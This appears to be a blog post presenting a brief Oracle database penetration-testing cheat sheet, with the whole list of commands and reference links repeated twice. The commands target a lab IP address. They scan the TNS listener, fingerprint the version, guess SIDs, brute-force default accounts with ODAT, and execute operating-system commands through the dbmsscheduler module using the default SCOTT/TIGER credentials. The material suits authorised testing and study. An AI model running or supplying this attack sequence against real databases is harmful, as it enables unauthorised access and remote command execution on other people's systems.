Oracle Database (commonly referred to as Oracle RDBMS or simply as Oracle) is an object-relational database management system produced and marketed by Oracle Corporation.
Find TNS Listener Port
nmap -p 1521 192.168.1.205
Get the Oracle version
tnscmd10g version -h 192.168.1.205
Get SID/Servicename
sidguess -i 192.168.1.205 -d /usr/share/metasploit-framework/data/wordlists/sid.txt
Brute Force Default Accounts
python odat.py passwordguesser -s 192.168.1.205 -d XE --accounts-file accounts/accounts_multiple.txt
Exploitation using dbmsscheduler
python odat.py dbmsscheduler -s 192.168.1.205 -U SCOTT -P TIGER -d XE --exec "commands"
https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/
http://www.isaca.org/Groups/Professional-English/oracle-database/GroupDocuments/oracle_privilege_escalation.pdf
http://www.orafaq.com/wiki/List_of_default_database_users
http://www.red-database-security.com/wp/oracle_cheat.pdf
https://www.adampalmer.me/iodigitalsec/2013/08/12/first-steps-in-oracle-penetration-testing/
http://www.red-database-security.com/wp/backtrack_oracle_tutorial.pdf
https://github.com/quentinhardy/odat
https://www.owasp.org/images/0/06/Database_Pen_Testing_OWASP_Atlanta_04212011.pdf
Find TNS Listener Port
nmap -p 1521 192.168.1.205
Get the Oracle version
tnscmd10g version -h 192.168.1.205
Get SID/Servicename
sidguess -i 192.168.1.205 -d /usr/share/metasploit-framework/data/wordlists/sid.txt
Brute Force Default Accounts
python odat.py passwordguesser -s 192.168.1.205 -d XE --accounts-file accounts/accounts_multiple.txt
Exploitation using dbmsscheduler
python odat.py dbmsscheduler -s 192.168.1.205 -U SCOTT -P TIGER -d XE --exec "commands"
https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/
http://www.isaca.org/Groups/Professional-English/oracle-database/GroupDocuments/oracle_privilege_escalation.pdf
http://www.orafaq.com/wiki/List_of_default_database_users
http://www.red-database-security.com/wp/oracle_cheat.pdf
https://www.adampalmer.me/iodigitalsec/2013/08/12/first-steps-in-oracle-penetration-testing/
http://www.red-database-security.com/wp/backtrack_oracle_tutorial.pdf
https://github.com/quentinhardy/odat
https://www.owasp.org/images/0/06/Database_Pen_Testing_OWASP_Atlanta_04212011.pdf
Tidak ada komentar:
Posting Komentar